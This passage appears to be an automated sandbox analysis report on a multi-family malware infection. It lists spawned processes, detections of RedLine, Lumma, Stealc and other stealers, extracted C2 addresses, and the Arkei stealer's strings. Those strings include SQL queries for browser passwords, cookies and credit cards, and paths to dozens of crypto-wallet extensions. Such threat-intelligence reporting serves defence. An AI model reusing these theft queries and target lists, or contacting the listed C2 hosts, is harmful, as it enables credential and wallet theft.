  - svchost.com (PID: 3132)
  - stub.exe (PID: 3372)
  - stub.exe (PID: 3364)
  - svchost.com (PID: 1812)
  - stub.exe (PID: 1268)
  - svchost.com (PID: 3088)
  - svchost.com (PID: 900)
  - svchost.com (PID: 2952)
  - stub.exe (PID: 3484)
  - svchost.com (PID: 2948)
  - stub.exe (PID: 3292)
  - svchost.com (PID: 3308)
  - stub.exe (PID: 1196)
  - svchost.com (PID: 3204)
  - stub.exe (PID: 2160)
  - svchost.com (PID: 2044)
  - stub.exe (PID: 584)
  - stub.exe (PID: 3864)
  - stub.exe (PID: 1632)
  - svchost.com (PID: 3560)
  - stub.exe (PID: 764)
  - svchost.com (PID: 1596)
  - svchost.com (PID: 2080)
  - svchost.com (PID: 3900)
  - svchost.com (PID: 2788)
  - svchost.com (PID: 3200)
  - stub.exe (PID: 3816)
  - stub.exe (PID: 3288)
  - stub.exe (PID: 3624)
  - stub.exe (PID: 2852)
  - svchost.com (PID: 3068)
  - stub.exe (PID: 3120)
  - svchost.com (PID: 2832)
  - stub.exe (PID: 712)
  - svchost.com (PID: 3064)
  - stub.exe (PID: 1936)
  - svchost.com (PID: 4004)
  - stub.exe (PID: 3132)
  - svchost.com (PID: 3372)
  - stub.exe (PID: 3148)
  - svchost.com (PID: 2804)
  - svchost.com (PID: 1812)
  - stub.exe (PID: 3872)
  - svchost.com (PID: 2448)
  - stub.exe (PID: 2488)
  - stub.exe (PID: 2476)
  - svchost.com (PID: 2260)
  - stub.exe (PID: 3544)
  - svchost.com (PID: 3656)
  - svchost.com (PID: 3432)
  - stub.exe (PID: 3484)
  - svchost.com (PID: 2036)
  - stub.exe (PID: 116)
  - svchost.com (PID: 3704)
  - stub.exe (PID: 3520)
  - svchost.com (PID: 3512)
  - stub.exe (PID: 124)
  - stub.exe (PID: 1836)
  - svchost.com (PID: 3516)
  - stub.exe (PID: 764)
  - svchost.com (PID: 4036)
  - svchost.com (PID: 1388)
  - stub.exe (PID: 3900)
  - svchost.com (PID: 2744)
  - svchost.com (PID: 864)
  - stub.exe (PID: 3640)
  - stub.exe (PID: 1596)
  - stub.exe (PID: 2688)
  - stub.exe (PID: 2576)
  - svchost.com (PID: 2852)
  - svchost.com (PID: 1808)
  - svchost.com (PID: 3016)
  - stub.exe (PID: 2988)
  - svchost.com (PID: 2784)
  - stub.exe (PID: 2812)
  - stub.exe (PID: 2796)
  - svchost.com (PID: 3084)
  - stub.exe (PID: 3056)
  - svchost.com (PID: 2484)
  - svchost.com (PID: 2476)
  - stub.exe (PID: 984)
  - stub.exe (PID: 2916)
  - svchost.com (PID: 1424)
  - stub.exe (PID: 2324)
  - svchost.com (PID: 3088)
  - stub.exe (PID: 2792)
  - stub.exe (PID: 1876)
  - svchost.com (PID: 3544)
  - svchost.com (PID: 3660)
  - svchost.com (PID: 2100)
  - stub.exe (PID: 2948)
  - svchost.com (PID: 2044)
  - stub.exe (PID: 584)
  - svchost.com (PID: 1772)
  - svchost.com (PID: 3512)
  - stub.exe (PID: 3528)
  - stub.exe (PID: 1344)
  - svchost.com (PID: 764)
  - stub.exe (PID: 4036)
  - svchost.com (PID: 1596)
  - stub.exe (PID: 1924)
  - stub.exe (PID: 1864)
  - stub.exe (PID: 3444)
  - svchost.com (PID: 2788)
  - stub.exe (PID: 1892)
  - svchost.com (PID: 956)
  - stub.exe (PID: 3044)
  - svchost.com (PID: 1388)
  - svchost.com (PID: 2504)
  - stub.exe (PID: 1936)
  - svchost.com (PID: 3416)
  - stub.exe (PID: 1808)
  - svchost.com (PID: 2760)
  - stub.exe (PID: 2988)
  - svchost.com (PID: 2832)
  - stub.exe (PID: 3364)
  - svchost.com (PID: 752)
  - stub.exe (PID: 3632)
  - stub.exe (PID: 2804)
  - svchost.com (PID: 2436)
  - svchost.com (PID: 2964)
  - stub.exe (PID: 3084)
  - svchost.com (PID: 2448)
  - svchost.com (PID: 2476)
  - stub.exe (PID: 1812)
  - stub.exe (PID: 3100)
  - svchost.com (PID: 2248)
  - stub.exe (PID: 3004)
  - svchost.com (PID: 3864)
  - svchost.com (PID: 2292)
  - stub.exe (PID: 1548)
  - svchost.com (PID: 2036)
  - stub.exe (PID: 1404)
  - svchost.com (PID: 1836)
  - svchost.com (PID: 3564)
  - stub.exe (PID: 2044)
  - stub.exe (PID: 1904)
  - stub.exe (PID: 1780)
  - svchost.com (PID: 1236)
  - stub.exe (PID: 3840)
  - svchost.com (PID: 2128)
  - stub.exe (PID: 764)
  - svchost.com (PID: 3972)
  - stub.exe (PID: 3900)
  - svchost.com (PID: 2692)
  - stub.exe (PID: 3444)
  - svchost.com (PID: 2928)
  - stub.exe (PID: 2576)
  - stub.exe (PID: 2056)
  - svchost.com (PID: 2852)
  - stub.exe (PID: 392)
  - svchost.com (PID: 4004)
  - stub.exe (PID: 2108)
  - svchost.com (PID: 2784)
  - svchost.com (PID: 3136)
  - stub.exe (PID: 3196)
  - svchost.com (PID: 2836)
  - svchost.com (PID: 3140)
  - stub.exe (PID: 2912)
  - svchost.com (PID: 3320)
  - stub.exe (PID: 3056)
  - svchost.com (PID: 3468)
  - stub.exe (PID: 3156)
  - svchost.com (PID: 1196)
  - stub.exe (PID: 2324)
  - stub.exe (PID: 2176)
  - svchost.com (PID: 1548)
  - svchost.com (PID: 2448)
  - stub.exe (PID: 1560)
  - svchost.com (PID: 2476)
  - stub.exe (PID: 3432)
  - svchost.com (PID: 2100)
  - stub.exe (PID: 124)
  - svchost.com (PID: 2068)
  - stub.exe (PID: 3660)
  - svchost.com (PID: 3820)
  - stub.exe (PID: 1860)
  - stub.exe (PID: 3704)
  - stub.exe (PID: 3636)
  - svchost.com (PID: 1836)
  - stub.exe (PID: 1316)
  - svchost.com (PID: 2044)
  - svchost.com (PID: 3644)
  - svchost.com (PID: 3900)
  - stub.exe (PID: 2592)
  - stub.exe (PID: 2740)
  - svchost.com (PID: 1236)
  - stub.exe (PID: 3816)
  - svchost.com (PID: 2788)
  - stub.exe (PID: 2928)
  - svchost.com (PID: 2240)
  - stub.exe (PID: 680)
  - svchost.com (PID: 2796)
  - stub.exe (PID: 4004)
  - svchost.com (PID: 712)
  - svchost.com (PID: 2832)
  - stub.exe (PID: 3064)
  - svchost.com (PID: 3164)
  - stub.exe (PID: 2812)
  - stub.exe (PID: 3124)
  - stub.exe (PID: 3508)
  - svchost.com (PID: 984)
  - stub.exe (PID: 2804)
  - svchost.com (PID: 2828)
  - svchost.com (PID: 3020)
  - svchost.com (PID: 3628)
  - stub.exe (PID: 3468)
  - stub.exe (PID: 2324)
  - svchost.com (PID: 3432)
  - stub.exe (PID: 2260)
  - stub.exe (PID: 1560)
  - svchost.com (PID: 1548)
  - stub.exe (PID: 2480)
  - svchost.com (PID: 2100)
  - stub.exe (PID: 3528)
  - svchost.com (PID: 2448)
  - svchost.com (PID: 2036)
  - svchost.com (PID: 3564)
  - stub.exe (PID: 3520)
  - stub.exe (PID: 2088)
  - svchost.com (PID: 3560)
  - stub.exe (PID: 3764)
  - stub.exe (PID: 1236)
  - svchost.com (PID: 1596)
  - svchost.com (PID: 548)
  - stub.exe (PID: 3736)
  - svchost.com (PID: 3200)
  - stub.exe (PID: 3964)
  - svchost.com (PID: 2744)
  - stub.exe (PID: 1892)
  - stub.exe (PID: 392)
  - svchost.com (PID: 2240)
  - stub.exe (PID: 2504)
  - svchost.com (PID: 1808)
  - stub.exe (PID: 2760)
  - svchost.com (PID: 2928)
  - svchost.com (PID: 3064)
  - stub.exe (PID: 884)
  - svchost.com (PID: 2812)
  - stub.exe (PID: 3364)
  - svchost.com (PID: 3492)
  - svchost.com (PID: 3020)
  - svchost.com (PID: 3812)
  - stub.exe (PID: 900)
  - stub.exe (PID: 2176)
  - stub.exe (PID: 3140)
  - svchost.com (PID: 1424)
  - svchost.com (PID: 2756)
  - svchost.com (PID: 3468)
  - stub.exe (PID: 3088)
  - stub.exe (PID: 3292)
  - stub.exe (PID: 3308)
  - svchost.com (PID: 2948)
  - svchost.com (PID: 2100)
  - svchost.com (PID: 3704)
  - stub.exe (PID: 1632)
  - stub.exe (PID: 3544)
  - stub.exe (PID: 1780)
  - svchost.com (PID: 480)
  - stub.exe (PID: 1772)
  - svchost.com (PID: 3764)
  - stub.exe (PID: 1216)
  - stub.exe (PID: 1596)
  - svchost.com (PID: 3624)
  - svchost.com (PID: 1924)
  - stub.exe (PID: 864)
  - stub.exe (PID: 2744)
  - stub.exe (PID: 3552)
  - svchost.com (PID: 4004)
  - svchost.com (PID: 3068)
  - svchost.com (PID: 680)
  - svchost.com (PID: 1936)
  - stub.exe (PID: 2988)
  - svchost.com (PID: 3196)
  - stub.exe (PID: 3136)
  - stub.exe (PID: 2836)
  - stub.exe (PID: 3492)
  - svchost.com (PID: 2932)
  - stub.exe (PID: 3872)
  - svchost.com (PID: 3392)
  - svchost.com (PID: 3124)
  - stub.exe (PID: 2320)
  - svchost.com (PID: 3812)
  - stub.exe (PID: 3100)
  - svchost.com (PID: 1996)
  - stub.exe (PID: 2296)
  - svchost.com (PID: 2260)
  - svchost.com (PID: 2860)
  - stub.exe (PID: 2488)
  - svchost.com (PID: 3548)
  - stub.exe (PID: 3404)
  - svchost.com (PID: 3608)
  - stub.exe (PID: 2448)
  - svchost.com (PID: 3648)
  - stub.exe (PID: 3596)
  - svchost.com (PID: 1864)
  - stub.exe (PID: 3640)
  - stub.exe (PID: 3520)
  - svchost.com (PID: 1892)
  - stub.exe (PID: 2788)
  - stub.exe (PID: 3044)
  - svchost.com (PID: 3072)
  - svchost.com (PID: 3972)
  - svchost.com (PID: 392)
  - svchost.com (PID: 2760)
  - svchost.com (PID: 3120)
  - stub.exe (PID: 2776)
  - stub.exe (PID: 3068)
  - stub.exe (PID: 2796)
  - svchost.com (PID: 3148)
  - stub.exe (PID: 3064)
  - stub.exe (PID: 3196)
  - svchost.com (PID: 4016)
  - svchost.com (PID: 3508)
  - stub.exe (PID: 900)
  - svchost.com (PID: 2436)
  - stub.exe (PID: 3872)
  - stub.exe (PID: 572)
  - svchost.com (PID: 2804)
  - stub.exe (PID: 1196)
  - svchost.com (PID: 3468)
  - svchost.com (PID: 1644)
  - stub.exe (PID: 3088)
  - svchost.com (PID: 2792)
  - stub.exe (PID: 2260)
  - svchost.com (PID: 2448)
  - stub.exe (PID: 3004)
  - stub.exe (PID: 3432)
  - svchost.com (PID: 3704)
  - stub.exe (PID: 2080)
  - svchost.com (PID: 3612)
  - stub.exe (PID: 3536)
  - svchost.com (PID: 3660)
  - stub.exe (PID: 2068)
  - svchost.com (PID: 1836)
  - stub.exe (PID: 3764)
  - svchost.com (PID: 3596)
  - stub.exe (PID: 3788)
  - svchost.com (PID: 1924)
  - stub.exe (PID: 2788)
  - svchost.com (PID: 3044)
  - stub.exe (PID: 3964)
  - svchost.com (PID: 3388)
  - stub.exe (PID: 2740)
  - stub.exe (PID: 2504)
  - svchost.com (PID: 392)
  - stub.exe (PID: 712)
  - svchost.com (PID: 2760)
  - svchost.com (PID: 3068)
  - stub.exe (PID: 2776)
  - svchost.com (PID: 3120)
  - stub.exe (PID: 2812)
  - svchost.com (PID: 3148)
  - stub.exe (PID: 3196)
  - stub.exe (PID: 3492)
  - stub.exe (PID: 2176)
  - svchost.com (PID: 984)
  - svchost.com (PID: 4016)
  - svchost.com (PID: 3156)
  - svchost.com (PID: 2324)
  - stub.exe (PID: 3812)
  - svchost.com (PID: 3628)
  - stub.exe (PID: 3468)
  - stub.exe (PID: 3872)
  - svchost.com (PID: 2292)
  - stub.exe (PID: 3432)
  - stub.exe (PID: 2792)
  - svchost.com (PID: 3228)
  - svchost.com (PID: 3060)
  - stub.exe (PID: 3544)
  - stub.exe (PID: 1772)
  - svchost.com (PID: 3564)
  - stub.exe (PID: 2080)
  - svchost.com (PID: 2088)
  - svchost.com (PID: 2000)
  - stub.exe (PID: 1216)
  - svchost.com (PID: 3512)
  - svchost.com (PID: 3612)
  - stub.exe (PID: 3308)
  - svchost.com (PID: 3972)
  - stub.exe (PID: 1820)
  - svchost.com (PID: 1832)
  - stub.exe (PID: 1924)
  - stub.exe (PID: 548)
  - svchost.com (PID: 3072)
  - stub.exe (PID: 1584)
  - svchost.com (PID: 2796)
  - stub.exe (PID: 3368)
  - svchost.com (PID: 3552)
  - stub.exe (PID: 2912)
  - svchost.com (PID: 2152)
  - stub.exe (PID: 4048)
  - svchost.com (PID: 1936)
  - stub.exe (PID: 3132)
  - svchost.com (PID: 3196)
  - stub.exe (PID: 3632)
  - stub.exe (PID: 2360)
  - savesinto.exe (PID: 2988)
  - tungbot.exe (PID: 3164)
  - explorer.exe (PID: 5180)
  - spoolsv.exe (PID: 5204)
  - icsys.icn.exe (PID: 3308)
  - svchost.exe (PID: 5044)
  - Temp3.exe (PID: 5260)
  - jxszdjpSrv.exe (PID: 7744)
- PHORPIEX has been detected (SURICATA)
  - 4363463463464363463463463.bin.exe (PID: 3168)
  - 4363463463464363463463463.bin.exe (PID: 1028)
  - 4363463463464363463463463.bin.exe (PID: 1844)
- Executed via WMI
  - schtasks.exe (PID: 3884)
  - schtasks.exe (PID: 3140)
  - schtasks.exe (PID: 2804)
  - schtasks.exe (PID: 3196)
  - schtasks.exe (PID: 3628)
  - schtasks.exe (PID: 2856)
  - schtasks.exe (PID: 2368)
  - schtasks.exe (PID: 4060)
  - schtasks.exe (PID: 1316)
  - schtasks.exe (PID: 752)
  - schtasks.exe (PID: 4048)
  - schtasks.exe (PID: 3508)
  - schtasks.exe (PID: 2320)
  - schtasks.exe (PID: 116)
  - schtasks.exe (PID: 3128)
  - schtasks.exe (PID: 3764)
  - schtasks.exe (PID: 1388)
  - schtasks.exe (PID: 3788)
  - schtasks.exe (PID: 1904)
  - schtasks.exe (PID: 1584)
  - schtasks.exe (PID: 3072)
  - schtasks.exe (PID: 3164)
  - schtasks.exe (PID: 3320)
  - schtasks.exe (PID: 3364)
  - schtasks.exe (PID: 480)
  - schtasks.exe (PID: 1780)
  - schtasks.exe (PID: 3608)
  - schtasks.exe (PID: 3820)
  - schtasks.exe (PID: 3736)
  - schtasks.exe (PID: 1596)
  - schtasks.exe (PID: 752)
  - schtasks.exe (PID: 3884)
  - schtasks.exe (PID: 3020)
  - }uqUir9@J.exe (PID: 7052)
  - schtasks.exe (PID: 2992)
  - schtasks.exe (PID: 6724)
  - schtasks.exe (PID: 7468)
  - schtasks.exe (PID: 5748)
  - schtasks.exe (PID: 6996)
  - schtasks.exe (PID: 7484)
  - schtasks.exe (PID: 7392)
  - schtasks.exe (PID: 7520)
  - schtasks.exe (PID: 7472)
  - schtasks.exe (PID: 7488)
  - schtasks.exe (PID: 7248)
  - schtasks.exe (PID: 7388)
  - schtasks.exe (PID: 7424)
  - schtasks.exe (PID: 7568)
  - schtasks.exe (PID: 1956)
  - schtasks.exe (PID: 7580)
  - schtasks.exe (PID: 7124)
  - schtasks.exe (PID: 7732)
  - schtasks.exe (PID: 2904)
  - schtasks.exe (PID: 3636)
  - schtasks.exe (PID: 7616)
  - schtasks.exe (PID: 7456)
  - schtasks.exe (PID: 7956)
  - schtasks.exe (PID: 3732)
  - schtasks.exe (PID: 7832)
  - schtasks.exe (PID: 7672)
  - schtasks.exe (PID: 7524)
  - schtasks.exe (PID: 3728)
  - schtasks.exe (PID: 7872)
  - schtasks.exe (PID: 7944)
- Reads product name
  - savesinto.exe (PID: 2988)
  - taskeng.exe (PID: 3068)
  - AppLaunch.exe (PID: 6108)
  - Setup2010u32.exe (PID: 5136)
  - flesh.exe (PID: 4404)
  - RegAsm.exe (PID: 4256)
  - taskeng.exe (PID: 4708)
  - }uqUir9@J.exe (PID: 7092)
- Reads security settings of Internet Explorer
  - powershell.exe (PID: 5576)
- Changes the registry key values via Powershell
  - powershell.exe (PID: 5576)
- Process checks whether UAC notifications are on
  - clip.exe (PID: 4224)
  - LEAJ.exe (PID: 4820)
  - cp.exe (PID: 1904)
  - AdobeUpdateres.exe (PID: 3716)
  - new.exe (PID: 6036)
  - AdobeUpdateres.exe (PID: 6772)
  - LEAJ.exe (PID: 6796)
- Reads mouse settings
  - NINJA.exe (PID: 5000)
  - system.exe (PID: 6784)
- Run PowerShell with an invisible window
  - powershell.exe (PID: 2384)
  - powershell.exe (PID: 8020)
- Unusual connection from system programs
  - vbc.exe (PID: 2792)
- The process executes via Task Scheduler
  - powershell.exe (PID: 2384)
  - system.exe (PID: 6784)
  - AdobeUpdateres.exe (PID: 6772)
  - LEAJ.exe (PID: 6796)
  - StringIds.exe (PID: 7640)
  - powershell.exe (PID: 8020)
  - LEAJ.exe (PID: 9236)
  - LEAJ.exe (PID: 900)
  - svchost.exe (PID: 7836)
  - svchost.exe (PID: 4212)
- Bypass execution policy to execute commands
  - powershell.exe (PID: 2384)
  - powershell.exe (PID: 8020)
- Checks for external IP
  - InstallSetup9.exe (PID: 5916)
  - Temp3.exe (PID: 5260)
  - Windows Security Client.exe (PID: 5356)
- REDLINE has been detected (SURICATA)
  - AppLaunch.exe (PID: 6108)
  - flesh.exe (PID: 4404)
  - RegAsm.exe (PID: 4256)
- Connects to the CnC server
  - AppLaunch.exe (PID: 6108)
  - }uqUir9@J.exe (PID: 7092)
  - nszDC12.tmp (PID: 5452)
  - pcidevicechecker.exe (PID: 1264)
  - buding.exe (PID: 4532)
- KELIHOS has been detected (SURICATA)
  - 4363463463464363463463463.bin.exe (PID: 1816)
- The executable file from the user directory is run by the CMD process
  - images.exe (PID: 6936)
  - Msblockreview.exe (PID: 10088)
- RHADAMANTHYS has been detected (SURICATA)
  - dialer.exe (PID: 4124)
- LUMMA has been detected (SURICATA)
  - AppLaunch.exe (PID: 5404)
- AZORULT has been detected (SURICATA)
  - }uqUir9@J.exe (PID: 7092)
- STEALC has been detected (SURICATA)
  - nszDC12.tmp (PID: 5452)
- Connects to FTP
  - TaAgente.exe (PID: 3644)
- Writes files like Keylogger logs
  - 4363463463464363463463463.bin.exe (PID: 3076)
  - 6.exe (PID: 9252)
- SOCKS5SYSTEMZ has been detected (SURICATA)
  - pcidevicechecker.exe (PID: 1264)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

RedLine

(PID) Process(696) ms_updater.exe

C2 (1)20.79.30.95:13856

BotnetLiveTraffic

Version1

(PID) Process(5852) RegSvcs.exe

C2 (1)91.92.241.115:12393

Botnetvic

Options

ErrorMessage

Keys

XorFiver

(PID) Process(1424) build.exe

C2 (1)52.91.10.228:9891

Botnetnew

Keys

Xor

Options

ErrorMessage

Arkei

(PID) Process(3236) data64_1.exe

C2 (1)http://gg.gemkan.online/gate.php

Strings (618)LoadLibraryA

GetProcAddress

ExitProcess

advapi32.dll

crypt32.dll

GetTickCount

Sleep

GetUserDefaultLangID

CreateMutexA

GetLastError

HeapAlloc

GetProcessHeap

GetComputerNameA

VirtualProtect

GetCurrentProcess

VirtualAllocExNuma

GetUserNameA

CryptStringToBinaryA

HAL9TH

JohnDoe

21/04/2022 20:00:00

http://

Default

%hu/%hu/%hu %hu:%hu:%hu

open

sqlite3.dll

C:\ProgramData\sqlite3.dll

freebl3.dll

C:\ProgramData\freebl3.dll

mozglue.dll

C:\ProgramData\mozglue.dll

msvcp140.dll

C:\ProgramData\msvcp140.dll

nss3.dll

C:\ProgramData\nss3.dll

softokn3.dll

C:\ProgramData\softokn3.dll

vcruntime140.dll

C:\ProgramData\vcruntime140.dll

.zip

Tag:

IP: IP?

Country: Country?

Working Path:

Local Time:

TimeZone:

Display Language:

Keyboard Languages:

Is Laptop:

Processor:

Installed RAM:

OS:

(

Bit)

Videocard:

Display Resolution:

PC name:

User name:

Domain name:

MachineID:

GUID:

Installed Software:

system.txt

Grabber\%s.zip

%APPDATA%

%LOCALAPPDATA%

%USERPROFILE%

%DESKTOP%

Wallets\

Ethereum

\Ethereum\

keystore

Electrum

\Electrum\wallets\

*.*

ElectrumLTC

\Electrum-LTC\wallets\

Exodus

\Exodus\

exodus.conf.json

window-state.json

\Exodus\exodus.wallet\

passphrase.json

seed.seco

info.seco

ElectronCash

\ElectronCash\wallets\

default_wallet

MultiDoge

\MultiDoge\

multidoge.wallet

JAXX

\jaxx\Local Storage\

file__0.localstorage

Atomic

\atomic\Local Storage\leveldb\

000003.log

CURRENT

LOCK

LOG

MANIFEST-000001

0000*

Binance

\Binance\

app-store.json

Coinomi

\Coinomi\Coinomi\wallets\

*.wallet

*.config

*wallet*.dat

GetSystemTime

lstrcatA

SystemTimeToFileTime

ntdll.dll

sscanf

memset

memcpy

wininet.dll

user32.dll

gdi32.dll

netapi32.dll

psapi.dll

bcrypt.dll

vaultcli.dll

shlwapi.dll

shell32.dll

gdiplus.dll

ole32.dll

dbghelp.dll

CreateFileA

WriteFile

CloseHandle

GetFileSize

lstrlenA

LocalAlloc

GlobalFree

ReadFile

OpenProcess

SetFilePointer

SetEndOfFile

GetCurrentProcessId

GetLocalTime

GetTimeZoneInformation

GetUserDefaultLocaleName

LocalFree

GetSystemPowerStatus

GetSystemInfo

GlobalMemoryStatusEx

IsWow64Process

GetTempPathA

GetLocaleInfoA

GetFileSizeEx

GetFileAttributesA

FindFirstFileA

FindNextFileA

FindClose

GetCurrentDirectoryA

CopyFileA

DeleteFileA

lstrcmpW

GlobalAlloc

FreeLibrary

SetCurrentDirectoryA

CreateFileMappingA

MapViewOfFile

UnmapViewOfFile

FileTimeToSystemTime

GetFileInformationByHandle

GlobalLock

GlobalSize

WideCharToMultiByte

GetWindowsDirectoryA

GetVolumeInformationA

GetVersionExA

GetModuleFileNameA

CreateFileW

CreateFileMappingW

MultiByteToWideChar

CreateThread

GetEnvironmentVariableA

SetEnvironmentVariableA

lstrcpyA

lstrcpynA

InternetOpenA

InternetConnectA

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

InternetCloseHandle

InternetReadFile

InternetSetOptionA

InternetOpenUrlA

InternetCrackUrlA

wsprintfA

CharToOemW

GetKeyboardLayoutList

EnumDisplayDevicesA

ReleaseDC

GetDC

GetSystemMetrics

GetDesktopWindow

GetWindowRect

GetWindowDC

CloseWindow

RegOpenKeyExA

RegQueryValueExA

RegCloseKey

GetCurrentHwProfileA

RegEnumKeyExA

RegGetValueA

CreateDCA

GetDeviceCaps

CreateCompatibleDC

CreateCompatibleBitmap

SelectObject

BitBlt

DeleteObject

StretchBlt

GetObjectW

GetDIBits

SaveDC

CreateDIBSection

DeleteDC

RestoreDC

DsRoleGetPrimaryDomainInformation

GetModuleFileNameExA

CryptUnprotectData

BCryptCloseAlgorithmProvider

BCryptDestroyKey

BCryptOpenAlgorithmProvider

BCryptSetProperty

BCryptGenerateSymmetricKey

BCryptDecrypt

VaultOpenVault

VaultCloseVault

VaultEnumerateItems

VaultGetItemWin8

VaultGetItemWin7

VaultFree

StrCmpCA

StrStrA

PathMatchSpecA

SHGetFolderPathA

ShellExecuteExA

GdipGetImageEncodersSize

GdipGetImageEncoders

GdipCreateBitmapFromHBITMAP

GdiplusStartup

GdiplusShutdown

GdipSaveImageToStream

GdipDisposeImage

GdipFree

CreateStreamOnHGlobal

GetHGlobalFromStream

SymMatchString

HEAD

HTTP/1.1

GET

POST

file

Content-Type: multipart/form-data; boundary=----

Content-Disposition: form-data; name="

Content-Disposition: form-data; name="file"; filename="

Content-Type: application/octet-stream

Content-Transfer-Encoding: binary

SOFT:

PROF: ?

PROF:

HOST:

USER:

PASS:

sqlite3_open

sqlite3_prepare_v2

sqlite3_step

sqlite3_column_text

sqlite3_finalize

sqlite3_close

sqlite3_column_bytes

sqlite3_column_blob

encrypted_key

PATH

PATH=

NSS_Init

NSS_Shutdown

PK11_GetInternalKeySlot

PK11_FreeSlot

PK11_Authenticate

PK11SDR_Decrypt

SELECT origin_url, username_value, password_value FROM logins

Cookies\%s_%s.txt

SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies

TRUE

FALSE

Autofill\%s_%s.txt

SELECT name, value FROM autofill

CC\%s_%s.txt

SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards

Card number:

Name on card:

Expiration date:

History\%s_%s.txt

SELECT url FROM urls

Downloads\%s_%s.txt

SELECT target_path, tab_url from downloads

Web Data

History

SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies

logins.json

formSubmitURL

usernameField

encryptedUsername

encryptedPassword

guid

SELECT fieldname, value FROM moz_formhistory

SELECT url FROM moz_places

cookies.sqlite

formhistory.sqlite

places.sqlite

\Local State

..\profiles.ini

C:\ProgramData\

Chrome

\Google\Chrome\User Data

ChromeBeta

\Google\Chrome Beta\User Data

ChromeCanary

\Google\Chrome SxS\User Data

Chromium

\Chromium\User Data

Edge_Chromium

\Microsoft\Edge\User Data

Kometa

\Kometa\User Data

Amigo

\Amigo\User Data

Torch

\Torch\User Data

Orbitum

\Orbitum\User Data

Comodo

\Comodo\Dragon\User Data

Nichrome

\Nichrome\User Data

Maxthon5

\Maxthon5\Users

Sputnik

\Sputnik\User Data

EPB

\Epic Privacy Browser\User Data

Vivaldi

\Vivaldi\User Data

CocCoc

\CocCoc\Browser\User Data

Uran

\uCozMedia\Uran\User Data

QIP

\QIP Surf\User Data

Cent

\CentBrowser\User Data

Elements

\Elements Browser\User Data

TorBro

\TorBro\Profile

CryptoTab

\CryptoTab Browser\User Data

Brave

\BraveSoftware\Brave-Browser\User Data

Opera

\Opera Software\Opera Stable\

OperaGX

\Opera Software\Opera GX Stable\

OperaNeon

\Opera Software\Opera Neon\User Data

Firefox

\Mozilla\Firefox\Profiles\

SlimBrowser

\FlashPeak\SlimBrowser\Profiles\

PaleMoon

\Moonchild Productions\Pale Moon\Profiles\

Waterfox

\Waterfox\Profiles\

Cyberfox

\8pecxstudios\Cyberfox\Profiles\

BlackHawk

\NETGATE Technologies\BlackHawk\Profiles\

IceCat

\Mozilla\icecat\Profiles\

KMeleon

\K-Meleon\

Thunderbird

\Thunderbird\Profiles\

passwords.txt

ibnejdfjmmkpcnlpebklmnkoeoihofec

TronLink

nkbihfbeogaeaoehlefnkodbefgpgknn

MetaMask

fhbohimaelbohpjbbldcngcnapndodjp

Binance Chain Wallet

ffnbelfdoeiohenkjibnmadjiehjhajb

Yoroi

jbdaocneiiinmjbjlgalhcelgbejmnid

Nifty Wallet

afbcbjpbpfadlkmhmclhkeeodmamcflc

Math Wallet

hnfanknocfeofbddgcijnmhnfnkdnaad

Coinbase Wallet

hpglfhgfnhbgpjdenjgmdgoeiappafln

Guarda

blnieiiffboillknjnepogjhkgnoapac

EQUAL Wallet

cjelfplplebdjjenllpjcblmjkfcffne

Jaxx Liberty

fihkakfobkmkjojpchpfgcmhfjnmnfpi

BitApp Wallet

kncchdigobghenbbaddojjnnaogfppfj

iWallet

amkmjjmmflddogmhpjloimipbofnfjih

Wombat

nlbmnnijcnlegkjjpcfjclmcfggfefdm

MEW CX

nanjmdknhkinifnkgdcggcfnhdaammmj

GuildWallet

nkddgncdjgjfcddamfgcmfnlhccnimig

Saturn Wallet

fnjhmkhhmkbjkkabndcnnogagogbneec

Ronin Wallet

cphhlgmgameodnhkjdmkpanlelnlohao

NeoLine

nhnkbkgjikgcigadomkphalanndcapjk

Clover Wallet

kpfopkelmapcoipemfendmdcghnegimn

Liquality Wallet

aiifbnbfobpmeekipheeijimdpnlpgpp

Terra Station

dmkamcknogkgcdfhhbddcghachkejeap

Keplr

fhmfendgdocmcbmfikdcogofphimnkno

Sollet

cnmamaachppnkjgnildpdmkaakejnhae

Auro Wallet

jojhfeoedkpkglbfimdfabpdfjaoolaf

Polymesh Wallet

flpiciilemghbmfalicajoolhkkenfel

ICONex

nknhiehlklippafakaeklbeglecifhad

Nabox Wallet

hcflpincpppdclinealmandijcmnkbgn

KHC

ookjlbkiijinhpmnjffcofjonbfbgaoc

Temple

mnfifefkajgofkcjkemidiaecocnkjeh

TezBox

dkdedlpgdmmkkfjabffeganieamfklkm

Cyano Wallet

nlgbhdfgdhgbiamfdfmbikcdghidoadd

Byone

infeboajgfhgbjpjbeppbkgnabfdkdaf

OneKey

cihmoadaighcejopammfbmddcmdekcje

LeafWallet

lodccjjbdhfakaekdiahmedfbieldgik

DAppPlay

ijmpgkjfkbfhoebgogflfebnmejmfbml

BitClip

lkcjlnjfpbikmcmbachjpdbijejflpcm

Steem Keychain

onofpnbbkehpmmoabgpcpmigafmmnjhl

Nash Extension

bcopgchhojmggmffilplmbdicgaihlkp

Hycon Lite Client

klnaejjgbibmhlephnhpmaofohgkpgkd

ZilPay

aeachknmefphepccionboohckonoeemg

Coin98 Wallet

bfnaelmomeimhlpmgjnjophhpkkoljpa

Phantom

hifafgmccdpekplomjjkcfgodnhcellj

Crypto.com

dngmlblcodfobpdpecaadgfbcggfjfnm

Maiar DeFi Wallet

ppdadbejkmjnefldpcdjhnkpbjkikoip

Oasis

hpbgcgmiemanfelegbndmhieiigkackl

MonstaWallet

fcckkdbjnoikooededlapcalpionmalo

MOBOX

jccapkebeeiajkkdemacblkjhhhboiek

Crust Wallet

mgffkfbidihjpoaomajlbgchddlicgpn

Pali Wallet

nphplpgoakhhjchkkhmiggakijnkhfnd

TON Wallet

ldinpeekobnhjjdofggfgjlcehhmanlj

Hiro Wallet

pocmplpaccanhmnllbbkpgfliimjljgo

Slope Wallet

bhhhlbepdkbapadjdnnojkbgioiodbic

Solflare Wallet

pgiaagfkgcbnmiiolekcfmljdagdhlcm

Stargazer Wallet

cgeeodpfagjceefieflmdfphplkenlfk

EVER Wallet

gjkdbeaiifkpoencioahhcilildpjhgh

partisia-wallet

bgjogpoidejdemgoochpnkmdjpocgkha

Ecto Wallet

ifckdpamphokdglkkdomedpdegcjhjdp

ONTO Wallet

agechnindjilpccclelhlbjphbgnobpf

